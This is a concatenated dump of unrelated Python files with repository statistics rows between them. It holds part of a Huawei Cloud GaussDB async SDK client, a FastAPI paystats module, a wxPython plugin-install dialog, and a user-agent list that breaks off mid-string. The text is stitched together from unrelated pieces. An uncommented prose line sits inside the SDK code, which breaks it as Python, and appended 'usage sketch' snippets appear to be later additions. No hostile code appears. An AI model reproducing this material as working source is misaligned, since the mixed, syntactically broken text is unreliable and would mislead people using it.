local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/backups/policy/update',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='UpdateGaussMySqlBackupPolicyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def update_gauss_my_sql_instance_name_async(self, request):
"""修改实例名称
修改实例名称
:param UpdateGaussMySqlInstanceNameRequest request
:return: UpdateGaussMySqlInstanceNameResponse
"""
return self.update_gauss_my_sql_instance_name_with_http_info(request)
def update_gauss_my_sql_instance_name_with_http_info(self, request):
"""修改实例名称
修改实例名称
:param UpdateGaussMySqlInstanceNameRequest request
:return: UpdateGaussMySqlInstanceNameResponse
"""
all_params = ['instance_id', 'mysql_update_instance_name_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/name',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='UpdateGaussMySqlInstanceNameResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def update_gauss_my_sql_quotas_async(self, request):
"""修改租户基于企业项目的资源配额
修改指定企业项目的资源配额。
:param UpdateGaussMySqlQuotasRequest request
:return: UpdateGaussMySqlQuotasResponse
"""
return self.update_gauss_my_sql_quotas_with_http_info(request)
def update_gauss_my_sql_quotas_with_http_info(self, request):
"""修改租户基于企业项目的资源配额
修改指定企业项目的资源配额。
:param UpdateGaussMySqlQuotasRequest request
:return: UpdateGaussMySqlQuotasResponse
"""
all_params = ['x_language', 'set_quotas_request']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/quotas',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='UpdateGaussMySqlQuotasResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def call_api(self, resource_path, method, path_params=None, query_params=None, header_params=None, body=None,
post_params=None, response_type=None, response_headers=None, auth_settings=None,
collection_formats=None, request_type=None):
"""Makes the HTTP request and returns deserialized data.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response_type: Response data type.
:param response_headers: Header should be added to response data.
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param request_type: Request data type.
:return:
Return the response directly.
"""
return self.do_http_request(
method=method,
resource_path=resource_path,
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body,
post_params=post_params,
response_type=response_type,
response_headers=response_headers,
collection_formats=collection_formats,
request_type=request_type,
async_request=True)
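A minimal usage sketch (not part of the original SDK file), shown under stated assumptions: `client` is taken to be an already-constructed instance of this client class with valid credentials and region configuration, ShowGaussMySqlQuotasRequest is assumed importable from the SDK's model package, and the parameter values are placeholders.
def example_show_quotas(client):
    # Hypothetical helper for illustration only.
    request = ShowGaussMySqlQuotasRequest()
    request.limit = 10    # 'limit' query parameter, as assembled in show_gauss_my_sql_quotas_with_http_info
    request.offset = 0    # 'offset' query parameter
    # Dispatches through call_api/do_http_request with async_request=True.
    return client.show_gauss_my_sql_quotas_async(request)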
| 32.449173
| 123
| 0.639749
| 6,980
| 68,630
| 5.861748
| 0.045845
| 0.050446
| 0.088281
| 0.038714
| 0.900159
| 0.894855
| 0.88283
| 0.87039
| 0.848809
| 0.689112
| 0
| 0.000904
| 0.27472
| 68,630
| 2,114
| 124
| 32.464522
| 0.821078
| 0.118024
| 0
| 0.811489
| 0
| 0
| 0.122839
| 0.053223
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050971
| false
| 0.004854
| 0.008091
| 0
| 0.11246
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68e4b16cf981c5743597b403dde38311368a0aea
| 750
|
py
|
Python
|
app/api/paystats.py
|
Saigesp/fastapi-test
|
6bfea3c34f49e3a87f1a8fb58071dbded6ccf376
|
[
"BSD-3-Clause"
] | null | null | null |
app/api/paystats.py
|
Saigesp/fastapi-test
|
6bfea3c34f49e3a87f1a8fb58071dbded6ccf376
|
[
"BSD-3-Clause"
] | null | null | null |
app/api/paystats.py
|
Saigesp/fastapi-test
|
6bfea3c34f49e3a87f1a8fb58071dbded6ccf376
|
[
"BSD-3-Clause"
] | null | null | null |
from app.services.validation import validate_postal_code_id
from app.selectors.paystats import (
get_paystats_by_age_gender_from_postal_code_id,
get_paystats_by_time_gender_from_postal_code_id,
)
async def get_paystats_by_age_gender(postal_code_id: int):
validate_postal_code_id(postal_code_id)
data = await get_paystats_by_age_gender_from_postal_code_id(postal_code_id)
return {
"postal_code_id": postal_code_id,
"results": data,
}
async def get_paystats_by_time_gender(postal_code_id: int):
validate_postal_code_id(postal_code_id)
data = await get_paystats_by_time_gender_from_postal_code_id(postal_code_id)
return {
"postal_code_id": postal_code_id,
"results": data,
}
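A minimal wiring sketch (not part of the original module): one plausible way to expose these coroutine handlers through a FastAPI router. The router prefix and path patterns below are assumptions for illustration only.
from fastapi import APIRouter

router = APIRouter(prefix="/paystats")  # hypothetical prefix
# Each handler validates the postal code and returns a JSON-serializable dict.
router.add_api_route("/age-gender/{postal_code_id}", get_paystats_by_age_gender, methods=["GET"])
router.add_api_route("/time-gender/{postal_code_id}", get_paystats_by_time_gender, methods=["GET"])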
| 28.846154
| 80
| 0.777333
| 114
| 750
| 4.508772
| 0.201754
| 0.330739
| 0.396887
| 0.210117
| 0.842412
| 0.747082
| 0.747082
| 0.747082
| 0.747082
| 0.583658
| 0
| 0
| 0.161333
| 750
| 25
| 81
| 30
| 0.81717
| 0
| 0
| 0.421053
| 0
| 0
| 0.056
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6b59d740828fedae0fbca60cd3433629e2564ac1
| 10,203
|
py
|
Python
|
views/fetchplugin_dialog.py
|
endymecy/NDIToolbox
|
f7a0a642b4a778d9d0c131871f4bfb9822ecb3da
|
[
"BSD-4-Clause"
] | 5
|
2017-02-28T16:16:06.000Z
|
2020-07-13T06:49:34.000Z
|
views/fetchplugin_dialog.py
|
endymecy/NDIToolbox
|
f7a0a642b4a778d9d0c131871f4bfb9822ecb3da
|
[
"BSD-4-Clause"
] | 1
|
2018-08-19T19:08:14.000Z
|
2018-08-19T19:08:14.000Z
|
views/fetchplugin_dialog.py
|
endymecy/NDIToolbox
|
f7a0a642b4a778d9d0c131871f4bfb9822ecb3da
|
[
"BSD-4-Clause"
] | 4
|
2017-10-25T20:17:15.000Z
|
2021-07-26T11:39:50.000Z
|
"""fetchplugin_idalog.py - dialog to configure remote fetch and inspection
of NDIToolbox plugins
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
from views import ui_defaults
from controllers import fetchplugin_dialog_ctrl
import wx
class FetchPluginDialog(wx.Dialog):
"""Dialog to configure local fetch and inspection
of plugins"""
def __init__(self, parent, plugin_path=None, plugin_type="Plugin"):
self.plugin_type = plugin_type
super(FetchPluginDialog, self).__init__(parent=parent, title="Install {0}".format(
self.plugin_type))
self.plugin_path = plugin_path
self.init_controller()
self.init_ui()
def init_controller(self):
"""Creates the view's controller"""
self.controller = fetchplugin_dialog_ctrl.FetchPluginDialogController(self)
def init_ui(self):
"""Creates and lays out the UI"""
self.main_panel_sizer = wx.FlexGridSizer(cols=2)
loc_lbl = wx.StaticText(self, wx.ID_ANY, u"{0} Location".format(self.plugin_type),
wx.DefaultPosition, wx.DefaultSize)
self.main_panel_sizer.Add(loc_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.url_tc = wx.TextCtrl(self, wx.ID_ANY, self.plugin_path,
wx.DefaultPosition,
wx.DefaultSize)
self.url_tc.SetToolTipString("Full path and filename of archive")
self.main_panel_sizer.Add(self.url_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
# Set password on encrypted archives
self.encryptedzip_cb = wx.CheckBox(self, wx.ID_ANY, u"Protected")
self.encryptedzip_cb.SetToolTipString("Enable if the archive is encrypted")
self.main_panel_sizer.Add(self.encryptedzip_cb, ui_defaults.ctrl_pct,
ui_defaults.sizer_flags,
ui_defaults.widget_margin)
zip_panel = wx.Panel(self)
zip_panel_sizer = wx.BoxSizer(wx.HORIZONTAL)
zippword_lbl = wx.StaticText(zip_panel, wx.ID_ANY, u"Password",
wx.DefaultPosition, wx.DefaultSize)
zip_panel_sizer.Add(zippword_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.zippword_tc = wx.TextCtrl(zip_panel, wx.ID_ANY, u'', wx.DefaultPosition,
wx.DefaultSize, style=wx.TE_PASSWORD)
zip_panel_sizer.Add(self.zippword_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
zip_panel.SetSizerAndFit(zip_panel_sizer)
self.main_panel_sizer.Add(zip_panel, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
0)
self.about_plugin_btn = wx.Button(self, wx.ID_ANY, "About {0}...".format(self.plugin_type),
wx.DefaultPosition, wx.DefaultSize)
self.about_plugin_btn.SetToolTipString("Displays the archive's README file")
self.Bind(wx.EVT_BUTTON, self.controller.on_about_plugin, self.about_plugin_btn)
self.main_panel_sizer.Add(self.about_plugin_btn, ui_defaults.ctrl_pct,
ui_defaults.sizer_flags,
0)
self._generate_std_buttons()
self.SetSizerAndFit(self.main_panel_sizer)
def _generate_std_buttons(self):
"""Generates the standard OK/Cancel dialog buttons"""
self.stdbtns = wx.StdDialogButtonSizer()
ok_btn = wx.Button(self, wx.ID_OK)
cancel_btn = wx.Button(self, wx.ID_CANCEL)
self.stdbtns.AddButton(ok_btn)
self.stdbtns.AddButton(cancel_btn)
self.stdbtns.Realize()
self.main_panel_sizer.Add(self.stdbtns, ui_defaults.lbl_pct, ui_defaults.sizer_flags,
0)
def install_plugin(self):
"""Attempts to download, verify, and install the plugin archive"""
self.controller.install_plugin()
class FetchRemotePluginDialog(wx.Dialog):
"""Dialog to configure remote fetch and inspection
of NDIToolbox Plugins"""
def __init__(self, parent, plugin_type="Plugin"):
self.plugin_type = plugin_type
super(FetchRemotePluginDialog, self).__init__(parent=parent,
title="Install {0}".format(self.plugin_type))
self.init_controller()
self.init_ui()
def init_controller(self):
"""Creates the view's controller"""
self.controller = fetchplugin_dialog_ctrl.FetchRemotePluginDialogController(self)
def install_plugin(self):
"""Attempts to download, verify, and install the plugin archive"""
self.controller.install_plugin()
def init_ui(self):
"""Creates and lays out the UI"""
self.main_panel_sizer = wx.FlexGridSizer(cols=2)
url_lbl = wx.StaticText(self, wx.ID_ANY, u"{0} URL".format(self.plugin_type),
wx.DefaultPosition, wx.DefaultSize)
self.main_panel_sizer.Add(url_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.url_tc = wx.TextCtrl(self, wx.ID_ANY, u'http://',
wx.DefaultPosition,
wx.DefaultSize)
self.url_tc.SetToolTipString("Example: http://www.tri-austin.com/nditoolbox/my_plugin.zip")
self.main_panel_sizer.Add(self.url_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
# Set username/password if necessary
self.login_cb = wx.CheckBox(self, wx.ID_ANY, u"Login Required")
self.login_cb.SetToolTipString("Enable if the URL requires a username and password")
self.main_panel_sizer.Add(self.login_cb, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
login_panel = wx.Panel(self)
login_panel_sizer = wx.BoxSizer(wx.HORIZONTAL)
uname_lbl = wx.StaticText(login_panel, wx.ID_ANY, u"Username",
wx.DefaultPosition, wx.DefaultSize)
login_panel_sizer.Add(uname_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.uname_tc = wx.TextCtrl(login_panel, wx.ID_ANY, u'', wx.DefaultPosition,
wx.DefaultSize)
login_panel_sizer.Add(self.uname_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
pword_lbl = wx.StaticText(login_panel, wx.ID_ANY, u"Password",
wx.DefaultPosition, wx.DefaultSize)
login_panel_sizer.Add(pword_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.pword_tc = wx.TextCtrl(login_panel, wx.ID_ANY, u'', wx.DefaultPosition,
wx.DefaultSize, style=wx.TE_PASSWORD)
login_panel_sizer.Add(self.pword_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
login_panel.SetSizerAndFit(login_panel_sizer)
self.main_panel_sizer.Add(login_panel, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
0)
# Set password on encrypted archives
self.encryptedzip_cb = wx.CheckBox(self, wx.ID_ANY, u"Protected")
self.encryptedzip_cb.SetToolTipString("Enable if the archive is encrypted")
self.main_panel_sizer.Add(self.encryptedzip_cb, ui_defaults.ctrl_pct,
ui_defaults.sizer_flags,
ui_defaults.widget_margin)
zip_panel = wx.Panel(self)
zip_panel_sizer = wx.BoxSizer(wx.HORIZONTAL)
zippword_lbl = wx.StaticText(zip_panel, wx.ID_ANY, u"Password",
wx.DefaultPosition, wx.DefaultSize)
zip_panel_sizer.Add(zippword_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.zippword_tc = wx.TextCtrl(zip_panel, wx.ID_ANY, u'', wx.DefaultPosition,
wx.DefaultSize, style=wx.TE_PASSWORD)
zip_panel_sizer.Add(self.zippword_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
zip_panel.SetSizerAndFit(zip_panel_sizer)
self.main_panel_sizer.Add(zip_panel, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
0)
self.about_plugin_btn = wx.Button(self, wx.ID_ANY, "About {0}...".format(self.plugin_type),
wx.DefaultPosition, wx.DefaultSize)
self.about_plugin_btn.SetToolTipString("Displays the archive's README file")
self.Bind(wx.EVT_BUTTON, self.controller.on_about_plugin, self.about_plugin_btn)
self.main_panel_sizer.Add(self.about_plugin_btn, ui_defaults.ctrl_pct,
ui_defaults.sizer_flags,
0)
self._generate_std_buttons()
self.SetSizerAndFit(self.main_panel_sizer)
def _generate_std_buttons(self):
"""Generates the standard OK/Cancel dialog buttons"""
self.stdbtns = wx.StdDialogButtonSizer()
ok_btn = wx.Button(self, wx.ID_OK)
cancel_btn = wx.Button(self, wx.ID_CANCEL)
self.stdbtns.AddButton(ok_btn)
self.stdbtns.AddButton(cancel_btn)
self.stdbtns.Realize()
self.main_panel_sizer.Add(self.stdbtns, ui_defaults.lbl_pct, ui_defaults.sizer_flags,
0)
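A minimal launch sketch (an assumption, not part of the original module): showing the remote-fetch dialog from a bare wxPython application and installing the plugin only when the user confirms with OK.
if __name__ == "__main__":
    app = wx.App(False)
    dialog = FetchRemotePluginDialog(parent=None, plugin_type="Plugin")
    if dialog.ShowModal() == wx.ID_OK:   # standard OK button generated in _generate_std_buttons
        dialog.install_plugin()          # delegates to the dialog's controller
    dialog.Destroy()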
| 53.984127
| 100
| 0.616289
| 1,198
| 10,203
| 4.950751
| 0.113523
| 0.101163
| 0.048221
| 0.054628
| 0.890575
| 0.875569
| 0.858034
| 0.852807
| 0.816051
| 0.782499
| 0
| 0.002092
| 0.297364
| 10,203
| 189
| 101
| 53.984127
| 0.82522
| 0.068509
| 0
| 0.743243
| 0
| 0
| 0.047892
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067568
| false
| 0.047297
| 0.02027
| 0
| 0.101351
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b854f8a7254b12d22c3c71a84de744156f484c2
| 33,394
|
py
|
Python
|
user_agents.py
|
p1ay8y3ar/Bauman-Mytishchi-Campus-Wifi-Tool
|
8208be5f11a1437c9d806930886e4cb6c4ae4510
|
[
"MIT"
] | null | null | null |
user_agents.py
|
p1ay8y3ar/Bauman-Mytishchi-Campus-Wifi-Tool
|
8208be5f11a1437c9d806930886e4cb6c4ae4510
|
[
"MIT"
] | null | null | null |
user_agents.py
|
p1ay8y3ar/Bauman-Mytishchi-Campus-Wifi-Tool
|
8208be5f11a1437c9d806930886e4cb6c4ae4510
|
[
"MIT"
] | null | null | null |
# try:
# from fake_useragent import UserAgent
#
# ua = UserAgent(verify_ssl=False, use_cache_server=False, cache=False)  # disable SSL verification
# print(ua.chrome)
#
# except Exception as e:
# print(e)
#
#
# re=[]
#
# count =0
#
# while count!=300:
# re.append(ua.random)
# count+=1
#
# print(re)
user_agents=['Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/26.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.66.18) Gecko/20177177 Firefox/45.66.18', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 
(Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 'Mozilla/5.0 (X11; Linux 
